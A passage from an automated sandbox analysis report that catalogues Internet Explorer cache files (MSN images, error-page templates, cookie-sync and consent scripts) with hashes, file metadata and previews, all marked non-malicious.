                                                    SHA-512:774151C6006DE9C8289D64A38717A5F01B45501061F030567C9D97053DA60F0D4BC0EC5B2DD574B2CD975750952DCFA694E99620FEB4B8B6B10A13FDD97CF35B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMumrE.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1689&y=1305
                                                    Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...LA@....(......(.h......l.F.C@3%.H.(..."h..Z`.KAD.......J...(..BS.....@..P.@......P.@..2_.O.....$...z.b&.|....((.P1..P0.............(...@......P.@.......{..R@.@......L.eh(x.c....(.P0.........(.....*[HM.o`2.[.l......S.\........^..R../.(.,._.d.5....1...o-...$...]._M...........J....e..b.....z..F7-J.|S#/..MR.....&.TQ...._.@=..RH.@.QLD...,-......(..A@......8...qh..J........)(
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BB10MkbM[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):936
                                                    Entropy (8bit):7.711185429072882
                                                    Encrypted:false
                                                    SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                                    MD5:19B9391F3CA20AA5671834C668105A22
                                                    SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                                    SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                                    SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    Preview: .PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......|.7....r.x..S.?.ws....B9.P.-Yt*..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.C*WB..F...b../.H..\..*.).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@...*..A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu.*.A)...-.w.*.1/+.)....XR.A#;..X...p..3!...H.....f.ok;..|x..1.R.\W.H\...<..<&.M!mk:|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BBMQmHU[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):389
                                                    Entropy (8bit):7.172427099901681
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7cIPH1Fo6TTPDnsxSMYz2jNtqwGAYWkixL:PI/1KwkSMYiptqwTPb
                                                    MD5:3E700D50C1629801F672F459CFD6CD4E
                                                    SHA1:03C0641ADB674F8FB607A8C6AD6FDC8C49F237DD
                                                    SHA-256:24A2FF64FA4F87C01A65C6817DF40A60353D4FC517567708EADE05770AF7DC2F
                                                    SHA-512:364E85CC304E2ADB3C0FEA43FD796F0E2D48890AB227787F6E036E599E1487DECF549B6485383AACDD24CD0E6EBD43DAD1E967540F0BB6330D3B323C80741AB0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    Preview: .PNG........IHDR................a....pHYs..........+.....7IDATx...M.@.E..3....a:...............@B.....15.....J$.._..g..g.c...G.......7p....k.f.."S.#.c..W..!..0..=~..*..e..ki.....\`..B.@..W.;R.....;8`|.b...+..s.B...A.-N.'...o']..W.....e...O.....O<....b...h.]E........x.U.g.{9..+^..N.....pn....6.-.6Y........U\..?.6.`.NG......Y{.......G..(.!.<..?I`......wv.o..c.S+......IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BBRUB0d[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):489
                                                    Entropy (8bit):7.208309014650151
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7wmcW0JYErMXrLYTh/BBoqavcAccySLY:jmx0aaM7LYtTpaWcy4Y
                                                    MD5:C090E4C7C513884E6B10030FCE2F2B37
                                                    SHA1:2BE9AD7D8CE94A585F0EA58DBC0B0A9A9933E854
                                                    SHA-256:C18187F3EF7089F6EA948C35797228FC4DFD3F90DBD2E78E531C6D2A92740471
                                                    SHA-512:DA9A5F97B70845AECD6BA20F87DA7FC2D6947AC9E2CFBA299B402459CE5ED8A1AA918A140B11879038961A3FA6B986736813CD1707D05B4A1BB9C195F52005CE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    Preview: .PNG........IHDR................a....pHYs..........+......IDATx.c......B.^.V..0..2..D0...3.J.1|\w....].L...........Km...M...|gx^<..............7.5.....k.1(n.f.v...}.....3.1|.w.......%@gr2..Y.......0...?Q.Q\ ....m.....W./..(.q....D5 ..,.e.Y..?.aj..(.p.+...;u.....A..n.FFF0...;.wLRQ.D1...?...w ........p5..a.n.. .....=c.4Vg.q..\!..&...._......a...>....?/.......lP..y....c...v.:..T_.69q..k..Y.x...jA...@1../.wm...&........&..}.x..~.0.........j.........Bb.._.\........IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\NewErrorPageTemplate[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1612
                                                    Entropy (8bit):4.869554560514657
                                                    Encrypted:false
                                                    SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                    MD5:DFEABDE84792228093A5A270352395B6
                                                    SHA1:E41258C9576721025926326F76063C2305586F76
                                                    SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                    SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\a5ea21[1].ico
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):758
                                                    Entropy (8bit):7.432323547387593
                                                    Encrypted:false
                                                    SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                    MD5:84CC977D0EB148166481B01D8418E375
                                                    SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                    SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                    SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                    Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\cfdbd9[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):740
                                                    Entropy (8bit):7.552939906140702
                                                    Encrypted:false
                                                    SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                    MD5:FE5E6684967766FF6A8AC57500502910
                                                    SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                    SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                    SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                    Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\checksync[1].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\checksync[2].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\de-ch[1].json
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):79097
                                                    Entropy (8bit):5.337866393801766
                                                    Encrypted:false
                                                    SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                    MD5:408DDD452219F77E388108945DE7D0FE
                                                    SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                    SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                    SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                    Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):2997
                                                    Entropy (8bit):4.4885437940628465
                                                    Encrypted:false
                                                    SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                    MD5:2DC61EB461DA1436F5D22BCE51425660
                                                    SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                    SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                    SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):748
                                                    Entropy (8bit):7.249606135668305
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                    MD5:C4F558C4C8B56858F15C09037CD6625A
                                                    SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                    SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                    SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):12105
                                                    Entropy (8bit):5.451485481468043
                                                    Encrypted:false
                                                    SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                    MD5:9234071287E637F85D721463C488704C
                                                    SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                    SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                    SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                    Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_9f7f4a3b7988491d30517f3692cbc88d[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):46291
                                                    Entropy (8bit):7.978820186098384
                                                    Encrypted:false
                                                    SSDEEP:768:E25BbRVX8QQSe+t80EjGq1tKzTCE+2gBBeRQe6P8xmnxL3pHliZwB96:E25BbRVX8QQSe1qq1c3CE+rei5ZLn6
                                                    MD5:7298CBD2DDF984F6E15BC13150C30A5A
                                                    SHA1:C6CAC4DD81C94D8D9A8CE35F3368628CDC689212
                                                    SHA-256:15FB01E0F45754B06F9A23CAD38E323867FAF88AC3DAAAAF8238EA657CB3F97C
                                                    SHA-512:B510B20D48AC17875E176069DE4E62D365E3C7D242A0578CE1F8AA5B0ADA90911229D3D72844B862AEE7E7F314B111CC8222B2DC3733F2AD0EFCF2A3791EC570
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F9f7f4a3b7988491d30517f3692cbc88d.jpg
                                                    Preview: ......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...............7...................................................................+.....T...y.%.\I-'.|w.~.e...d.&..Sa.<M.v ...].^....G.>K.q.Q.nO%..Rq........I.6T.bEcB.......&.....N....W.N..2.]I...y%3%I.\N.o6... ........|U]...v>w.....KyW.|?...I*]L..:.t.!O..Se....g...At]{.+.WC^.;......=r......w...SC...^IO.v..ge.+..,..............s]....r.J.e.....L.R..?......q?....M.....,.47GW.(..A..uvNc..9..xJ.s.vd....U.......R......(.... ....kh....Mm.........y..4..IK.CI.......\gJ..i..8.h..8W.....h.Kov..X..YHX.J.6.F,.Y3.t)[`.F..+!.q..q..F.c.D.........SFU.....MW...0VT..vl..S..v.s.a%Ju..W/.~f....m..V ...,..U..SN^.C....../T.b...W..S...C..hG.P[C<.p7E...L..xW...h*.^.[H5M .t.e.._'..\.5......!...:z..E...l8V.".a..[..a..PU.~....z.....M....%...=.W.<....Eh..Z...1N.;..Ip.Q..7.N..;Cx<#L.^......z>_PO......./MOO..T)....+z.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\iab2Data[1].json
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):242382
                                                    Entropy (8bit):5.1486574437549235
                                                    Encrypted:false
                                                    SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                    MD5:D76FFE379391B1C7EE0773A842843B7E
                                                    SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                    SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                    SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                    Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\location[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with no line terminators
